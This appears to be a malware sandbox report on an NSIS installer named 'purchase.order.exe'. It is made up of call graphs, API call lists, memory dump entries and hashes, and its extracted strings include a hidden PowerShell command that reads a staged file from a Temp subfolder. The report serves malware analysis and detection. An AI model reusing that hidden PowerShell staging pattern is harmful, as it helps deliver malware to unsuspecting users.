4021cf 4054 402dcb 21 API calls 4053->4054 4055 4021d6 4054->4055 4056 402dcb 21 API calls 4055->4056 4057 4021e0 4056->4057 4058 402dcb 21 API calls 4057->4058 4059 4021ea 4058->4059 4060 402dcb 21 API calls 4059->4060 4061 4021f4 4060->4061 4062 402dcb 21 API calls 4061->4062 4063 4021fe 4062->4063 4064 40223d CoCreateInstance 4063->4064 4065 402dcb 21 API calls 4063->4065 4068 40225c 4064->4068 4065->4064 4066 401423 28 API calls 4067 40231b 4066->4067 4068->4066 4068->4067 4069 403bd1 4070 403bdc 4069->4070 4071 403be0 4070->4071 4072 403be3 GlobalAlloc 4070->4072 4072->4071 4080 401a55 4081 402dcb 21 API calls 4080->4081 4082 401a5e ExpandEnvironmentStringsW 4081->4082 4083 401a72 4082->4083 4085 401a85 4082->4085 4084 401a77 lstrcmpW 4083->4084 4083->4085 4084->4085 4086 4014d7 4087 402da9 21 API calls 4086->4087 4088 4014dd Sleep 4087->4088 4090 402c4f 4088->4090 4096 4023d7 4097 4023e5 4096->4097 4098 4023df 4096->4098 4100 402dcb 21 API calls 4097->4100 4101 4023f3 4097->4101 4099 402dcb 21 API calls 4098->4099 4099->4097 4100->4101 4102 402dcb 21 API calls 4101->4102 4104 402401 4101->4104 4102->4104 4103 402dcb 21 API calls 4105 40240a WritePrivateProfileStringW 4103->4105 4104->4103 4106 402459 4107 402461 4106->4107 4108 40248c 4106->4108 4109 402e0b 21 API calls 4107->4109 4110 402dcb 21 API calls 4108->4110 4111 402468 4109->4111 4112 402493 4110->4112 4114 402dcb 21 API calls 4111->4114 4115 4024a0 4111->4115 4117 402e89 4112->4117 4116 402479 RegDeleteValueW RegCloseKey 4114->4116 4116->4115 4118 402e9d 4117->4118 4120 402e96 4117->4120 4118->4120 4121 402ece 4118->4121 4120->4115 4122 4063ae RegOpenKeyExW 4121->4122 4123 402efc 4122->4123 4124 402f0c RegEnumValueW 4123->4124 4131 402fa6 4123->4131 4133 402f2f 4123->4133 4126 402f96 RegCloseKey 4124->4126 4124->4133 4125 402f6b RegEnumKeyW 4127 402f74 RegCloseKey 4125->4127 4125->4133 4126->4131 4128 406935 5 API calls 4127->4128 4130 402f84 4128->4130 4129 402ece 6 API calls 4129->4133 4130->4131 
4132 402f88 RegDeleteKeyW 4130->4132 4131->4120 4132->4131 4133->4125 4133->4126 4133->4127 4133->4129 4134 40175a 4135 402dcb 21 API calls 4134->4135 4136 401761 SearchPathW 4135->4136 4137 40177c 4136->4137 4138 401d5d 4139 402da9 21 API calls 4138->4139 4140 401d64 4139->4140 4141 402da9 21 API calls 4140->4141 4142 401d70 GetDlgItem 4141->4142 4143 40265d 4142->4143 4144 406c5f 4150 406ae3 4144->4150 4145 40744e 4146 406b64 GlobalFree 4147 406b6d GlobalAlloc 4146->4147 4147->4145 4147->4150 4148 406be4 GlobalAlloc 4148->4145 4148->4150 4149 406bdb GlobalFree 4149->4148 4150->4145 4150->4146 4150->4147 4150->4148 4150->4149 4151 402663 4152 402692 4151->4152 4153 402677 4151->4153 4155 4026c2 4152->4155 4156 402697 4152->4156 4154 402da9 21 API calls 4153->4154 4165 40267e 4154->4165 4158 402dcb 21 API calls 4155->4158 4157 402dcb 21 API calls 4156->4157 4159 40269e 4157->4159 4160 4026c9 lstrlenW 4158->4160 4168 406563 WideCharToMultiByte 4159->4168 4160->4165 4162 4026b2 lstrlenA 4162->4165 4163 4026f6 4164 40270c 4163->4164 4166 4060e3 WriteFile 4163->4166 4165->4163 4165->4164 4169 406112 SetFilePointer 4165->4169 4166->4164 4168->4162 4170 40612e 4169->4170 4173 406146 4169->4173 4171 4060b4 ReadFile 4170->4171 4172 40613a 4171->4172 4172->4173 4174 406177 SetFilePointer 4172->4174 4175 40614f SetFilePointer 4172->4175 4173->4163 4174->4173 4175->4174 4176 40615a 4175->4176 4177 4060e3 WriteFile 4176->4177 4177->4173 3556 4015e6 3557 402dcb 21 API calls 3556->3557 3558 4015ed 3557->3558 3576 405ebb CharNextW CharNextW 3558->3576 3560 4015f6 3561 401656 3560->3561 3562 405e3d CharNextW 3560->3562 3572 40163c GetFileAttributesW 3560->3572 3573 40161f 3560->3573 3586 405b0c 3560->3586 3592 405aef CreateDirectoryW 3560->3592 3563 40165b 3561->3563 3565 401688 3561->3565 3562->3560 3582 401423 3563->3582 3567 401423 28 API calls 3565->3567 3574 401680 3567->3574 3571 40166f SetCurrentDirectoryW 3571->3574 3572->3560 3573->3560 3589 405a95 CreateDirectoryW 
                                          [Function call-graph edge list from the interactive graph viewer omitted: it listed node ids and function addresses (e.g. 40351c, 4055c6, 406541) with the Win32 API names called from each function.]

                                          Control-flow Graph (legend: Executed / Not Executed)
                                          [Basic-block edge list for the function at 40351c-403a77 omitted: its blocks call SetErrorMode, GetVersionExW, lstrlenA, COMCTL32 #17, OleInitialize, SHGetFileInfoW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, DeleteFileW, GetCurrentProcess, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, ExitWindowsEx, ExitProcess, SetCurrentDirectoryW and CopyFileW.]
                                          APIs
                                          • SetErrorMode.KERNELBASE ref: 0040353F
                                          • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040356A
                                          • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 0040357D
                                          • lstrlenA.KERNEL32(UXTHEME,UXTHEME,?,?,?,?,?,?,?,?), ref: 00403616
                                          • #17.COMCTL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403653
                                          • OleInitialize.OLE32(00000000), ref: 0040365A
                                          • SHGetFileInfoW.SHELL32(00420EC8,00000000,?,000002B4,00000000), ref: 00403679
                                          • GetCommandLineW.KERNEL32(00428A20,NSIS Error,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040368E
                                          • CharNextW.USER32(00000000,"C:\Users\user\Desktop\purchase.order.exe",00000020,"C:\Users\user\Desktop\purchase.order.exe",00000000,?,00000008,0000000A,0000000C), ref: 004036C7
                                          • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00008001,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004037FF
                                          • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403810
                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040381C
                                          • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403830
                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403838
                                          • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403849
                                          • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403851
                                          • DeleteFileW.KERNELBASE(1033,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403865
                                          • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\purchase.order.exe",00000000,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040393E
                                            • Part of subcall function 00406541: lstrcpynW.KERNEL32(?,?,00000400,0040368E,00428A20,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040654E
                                          • wsprintfW.USER32 ref: 0040399B
                                          • GetFileAttributesW.KERNEL32(0042C800,C:\Users\user\AppData\Local\Temp\), ref: 004039CE
                                          • DeleteFileW.KERNEL32(0042C800), ref: 004039DA
                                          • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403A08
                                            • Part of subcall function 00406301: MoveFileExW.KERNEL32(?,?,00000005,00405DFF,?,00000000,000000F1,?,?,?,?,?), ref: 0040630B
                                          • CopyFileW.KERNEL32(00437800,0042C800,00000001,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403A1E
                                            • Part of subcall function 00405B24: CreateProcessW.KERNELBASE(00000000,0042C800,00000000,00000000,00000000,04000000,00000000,00000000,00425F10,?,?,?,0042C800,?), ref: 00405B4D
                                            • Part of subcall function 00405B24: CloseHandle.KERNEL32(?,?,?,0042C800,?), ref: 00405B5A
                                            • Part of subcall function 0040689E: FindFirstFileW.KERNELBASE(?,00425F58,00425710,00405F61,00425710,00425710,00000000,00425710,00425710, 4Mw,?,C:\Users\user\AppData\Local\Temp\,00405C6D,?,774D3420,C:\Users\user\AppData\Local\Temp\), ref: 004068A9
                                            • Part of subcall function 0040689E: FindClose.KERNEL32(00000000), ref: 004068B5
                                          • OleUninitialize.OLE32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A6C
                                          • ExitProcess.KERNEL32 ref: 00403A89
                                          • CloseHandle.KERNEL32(00000000,0042D000,0042D000,?,0042C800,00000000), ref: 00403A90
                                          • GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403AAC
                                          • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 00403AB3
                                          • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403AC8
                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00403AEB
                                          • ExitWindowsEx.USER32(00000002,80040002), ref: 00403B10
                                          • ExitProcess.KERNEL32 ref: 00403B33
                                            • Part of subcall function 00405AEF: CreateDirectoryW.KERNELBASE(?,00000000,0040350F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00405AF5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1473750419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473836494.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1474076538.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID: File$Process$CloseDirectoryExit$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
                                          • String ID: "C:\Users\user\Desktop\purchase.order.exe"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes$C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Databehandlende\Tilsmil$C:\Users\user\Desktop$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$powershell.exe -windowstyle hidden "$Unsolaced207=gc -raw 'C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes$~nsu%X.tmp
                                          • API String ID: 1813718867-508498385
                                          • Opcode ID: 9f65d0021fa33c3354d42538bbc8dc08c63897f5b3407e021a3db38cc4d3dfe0
                                          • Instruction ID: b6c3ecddbcec298392be70143bc2b9781a35be0696dc4cb4866b7eddd329dddd
                                          • Opcode Fuzzy Hash: 9f65d0021fa33c3354d42538bbc8dc08c63897f5b3407e021a3db38cc4d3dfe0
                                          • Instruction Fuzzy Hash: A9F12370604311ABD720AF659D05B2B7EE8EF8570AF10483EF481B22D1DB7D9A45CB6E

                                          Control-flow Graph
                                          (Control-flow graph of the function starting at 00405705: the rendered graph is not reproduced here; its API calls are listed below.)
                                          APIs
                                          • GetDlgItem.USER32(?,00000403), ref: 00405763
                                          • GetDlgItem.USER32(?,000003EE), ref: 00405772
                                          • GetClientRect.USER32(?,?), ref: 004057AF
                                          • GetSystemMetrics.USER32(00000002), ref: 004057B6
                                          • SendMessageW.USER32(?,00001061,00000000,?), ref: 004057D7
                                          • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057E8
                                          • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004057FB
                                          • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405809
                                          • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040581C
                                          • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040583E
                                          • ShowWindow.USER32(?,00000008), ref: 00405852
                                          • GetDlgItem.USER32(?,000003EC), ref: 00405873
                                          • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405883
                                          • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040589C
                                          • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004058A8
                                          • GetDlgItem.USER32(?,000003F8), ref: 00405781
                                            • Part of subcall function 004044F5: SendMessageW.USER32(00000028,?,00000001,00404320), ref: 00404503
                                          • GetDlgItem.USER32(?,000003EC), ref: 004058C5
                                          • CreateThread.KERNELBASE(00000000,00000000,Function_00005699,00000000), ref: 004058D3
                                          • CloseHandle.KERNELBASE(00000000), ref: 004058DA
                                          • ShowWindow.USER32(00000000), ref: 004058FE
                                          • ShowWindow.USER32(?,00000008), ref: 00405903
                                          • ShowWindow.USER32(00000008), ref: 0040594D
                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405981
                                          • CreatePopupMenu.USER32 ref: 00405992
                                          • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004059A6
                                          • GetWindowRect.USER32(?,?), ref: 004059C6
                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059DF
                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A17
                                          • OpenClipboard.USER32(00000000), ref: 00405A27
                                          • EmptyClipboard.USER32 ref: 00405A2D
                                          • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A39
                                          • GlobalLock.KERNEL32(00000000), ref: 00405A43
                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A57
                                          • GlobalUnlock.KERNEL32(00000000), ref: 00405A77
                                          • SetClipboardData.USER32(0000000D,00000000), ref: 00405A82
                                          • CloseClipboard.USER32 ref: 00405A88
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1473750419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473836494.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1474076538.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                          • String ID: {
                                          • API String ID: 590372296-366298937
                                          • Opcode ID: 3824989ea0536e5c3d89d87b24ed579d9185aa06a8fa494c1d573172a0034d7b
                                          • Instruction ID: 1ec4b4c3d0988b91a44b02e8c0f1a80d5eff4bd371306251f5288e66bb296ab7
                                          • Opcode Fuzzy Hash: 3824989ea0536e5c3d89d87b24ed579d9185aa06a8fa494c1d573172a0034d7b
                                          • Instruction Fuzzy Hash: 4FB139B1900608FFDB11AFA0DD89AAE7B79FB04354F40813AFA41B61A0CB744E51DF68

                                          Control-flow Graph
                                          (Control-flow graph of the function starting at 00406C5F: the rendered graph is not reproduced here.)
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1473750419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473836494.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1474076538.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c61fa70d481ae7decb37dc56cf27f7a4c6ea5b826eb98dd3ad332090416f9cd2
                                          • Instruction ID: db5d81fcbfa5be4a2d8af1487b95e9640f9c883cb1993a3fcb30b22963867ec5
                                          • Opcode Fuzzy Hash: c61fa70d481ae7decb37dc56cf27f7a4c6ea5b826eb98dd3ad332090416f9cd2
                                          • Instruction Fuzzy Hash: 87F17871D04229CBDF28CFA8C8946ADBBB0FF44305F25816ED456BB281D7786A86CF45

                                          Control-flow Graph
                                          (Control-flow graph of the function starting at 0040689E: the rendered graph is not reproduced here; its API calls are listed below.)
                                          APIs
                                          • FindFirstFileW.KERNELBASE(?,00425F58,00425710,00405F61,00425710,00425710,00000000,00425710,00425710, 4Mw,?,C:\Users\user\AppData\Local\Temp\,00405C6D,?,774D3420,C:\Users\user\AppData\Local\Temp\), ref: 004068A9
                                          • FindClose.KERNEL32(00000000), ref: 004068B5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1473750419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473836494.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1474076538.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID: Find$CloseFileFirst
                                          • String ID: X_B
                                          • API String ID: 2295610775-941606717
                                          • Opcode ID: 368a1c0a689282c2aa5195ddf357efb180b92b440bed087baa82a07527058284
                                          • Instruction ID: f67f359cedd367be1f2f51a398ada2a6aadcf11014009cc1af4821528039bb17
                                          • Opcode Fuzzy Hash: 368a1c0a689282c2aa5195ddf357efb180b92b440bed087baa82a07527058284
                                          • Instruction Fuzzy Hash: 68D0123251A5205BC64067396E0C84B7B58AF153717268A36F5AAF21E0CB348C6A969C

                                          Control-flow Graph
                                          (Control-flow graph of the function starting at 00403FC1: the rendered graph is not reproduced here; its API calls are listed below.)
                                          APIs
                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FFD
                                          • ShowWindow.USER32(?), ref: 0040401D
                                          • GetWindowLongW.USER32(?,000000F0), ref: 0040402F
                                          • ShowWindow.USER32(?,00000004), ref: 00404048
                                          • DestroyWindow.USER32 ref: 0040405C
                                          • SetWindowLongW.USER32(?,00000000,00000000), ref: 00404075
                                          • GetDlgItem.USER32(?,?), ref: 00404094
                                          • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004040A8
                                          • IsWindowEnabled.USER32(00000000), ref: 004040AF
                                          • GetDlgItem.USER32(?,00000001), ref: 0040415A
                                          • GetDlgItem.USER32(?,00000002), ref: 00404164
                                          • SetClassLongW.USER32(?,000000F2,?), ref: 0040417E
                                          • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041CF
                                          • GetDlgItem.USER32(?,00000003), ref: 00404275
                                          • ShowWindow.USER32(00000000,?), ref: 00404296
                                          • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004042A8
                                          • EnableWindow.USER32(?,?), ref: 004042C3
                                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042D9
                                          • EnableMenuItem.USER32(00000000), ref: 004042E0
                                          • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004042F8
                                          • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040430B
                                          • lstrlenW.KERNEL32(00422F08,?,00422F08,00000000), ref: 00404335
                                          • SetWindowTextW.USER32(?,00422F08), ref: 00404349
                                          • ShowWindow.USER32(?,0000000A), ref: 0040447D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1473750419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473836494.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1474076538.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                          • String ID:
                                          • API String ID: 121052019-0
                                          • Opcode ID: 4b3fe02cb5795506d30df4e66f46237e59566fdbff82c58b44480cf0eb866077
                                          • Instruction ID: f4824fcfb4375dbde2e3aa314f90dcffafac0cdac9d9fdfce080a9e5a5e1030c
                                          • Opcode Fuzzy Hash: 4b3fe02cb5795506d30df4e66f46237e59566fdbff82c58b44480cf0eb866077
                                          • Instruction Fuzzy Hash: E7C1CEB1600200BBCB216F61EE49E2B3A68FB95719F41053EF751B11F0CB795882DB2E

                                          Control-flow Graph
                                          • Rendered graph not reproduced (nodes were coloured Executed / Not Executed); the function spans 0x403c13-0x403ee8.
                                          • Beyond the APIs listed below, the graph shows calls to the internal subroutines 0x406935, 0x406488, 0x40640f, 0x403ee9, 0x405f18, 0x40657e, 0x405e3d, 0x405e10, 0x406541, 0x405e5c, 0x40140b, 0x4068c5, 0x405699 and 0x403b63.
                                          APIs
                                            • Part of subcall function 00406935: GetModuleHandleA.KERNEL32(?,00000020,?,0040362C,0000000C,?,?,?,?,?,?,?,?), ref: 00406947
                                            • Part of subcall function 00406935: GetProcAddress.KERNEL32(00000000,?), ref: 00406962
                                          • lstrcatW.KERNEL32(1033,00422F08,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F08,00000000,00000002,774D3420,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\purchase.order.exe",00008001), ref: 00403C94
                                          • lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes,1033,00422F08,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F08,00000000,00000002,774D3420), ref: 00403D14
                                          • lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes,1033,00422F08,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F08,00000000), ref: 00403D27
                                          • GetFileAttributesW.KERNEL32(: Completed), ref: 00403D32
                                          • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes), ref: 00403D7B
                                            • Part of subcall function 00406488: wsprintfW.USER32 ref: 00406495
                                          • RegisterClassW.USER32(004289C0), ref: 00403DB8
                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403DD0
                                          • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403E05
                                          • ShowWindow.USER32(00000005,00000000), ref: 00403E3B
                                          • GetClassInfoW.USER32(00000000,RichEdit20W,004289C0), ref: 00403E67
                                          • GetClassInfoW.USER32(00000000,RichEdit,004289C0), ref: 00403E74
                                          • RegisterClassW.USER32(004289C0), ref: 00403E7D
                                          • DialogBoxParamW.USER32(?,00000000,00403FC1,00000000), ref: 00403E9C
                                          Strings
                                          Memory Dump Source
                                          • Same source file and associated dumps as listed for the function at 0x403fc1 above (00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true).
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
